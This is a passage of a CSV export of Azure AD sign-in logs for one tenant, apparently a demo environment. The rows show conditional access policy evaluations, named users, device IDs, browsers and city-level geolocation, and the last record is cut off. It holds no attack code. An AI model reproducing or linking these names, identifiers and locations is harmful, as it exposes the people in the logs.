'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c967a571100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,189268ff-d871-4dc4-914e-2c967a571100,SigninLogs,Sucess,33.7984581,-84.38828278
+1902,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2b1559c7-79cd-408e-bfc5-aaf33e301562,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0cfe4b5b-09c7-4394-bb27-21b949620f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0cfe4b5b-09c7-4394-bb27-21b949620f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1903,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5f6113f-1191-4851-bd34-7ebd06779a25,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:06,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",42ec543f-db91-4d87-b07f-74fd45f21000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,42ec543f-db91-4d87-b07f-74fd45f21000,SigninLogs,Sucess,33.7984581,-84.38828278
+1904,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:37.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7f20db42-14bc-49cf-8d3d-e75552278db6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c9681581100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,189268ff-d871-4dc4-914e-2c9681581100,SigninLogs,Sucess,33.7984581,-84.38828278
+1905,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:12.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9fba19d3-5823-4cb3-8b12-d004696ee444,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbffb959-9fbe-4abe-95ed-0d85adda1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,cbffb959-9fbe-4abe-95ed-0d85adda1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1906,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:06.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,66c5469f-00ac-0000-ccb2-a05b18298c2e,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,,[],notApplied,08/04/2020 14:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",1416e882-0702-4c93-abe4-fa3fa1eb4100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1416e882-0702-4c93-abe4-fa3fa1eb4100,SigninLogs,Failed,38.47222137,-77.41989899
+1907,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:10.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3c31282f-125b-44e7-83fc-17e9bdd3fced,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5eeacde1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,4f5563e9-cd91-4aaf-8dc5-b5eeacde1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1908,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:11.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,090a1951-fb01-4c72-b890-7ed48df56147,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5eeeede1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,4f5563e9-cd91-4aaf-8dc5-b5eeeede1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1909,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:43.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,024fdd65-4acf-46c4-8e97-aaced536e2c0,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:07,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Edge 18.1836', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",554bf1b2-bdac-4646-9ba2-bdd53c141b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,554bf1b2-bdac-4646-9ba2-bdd53c141b00,SigninLogs,Sucess,29.4803009,-81.21395111
+1910,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc339050-226d-414a-af9f-0f1480c18bd0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 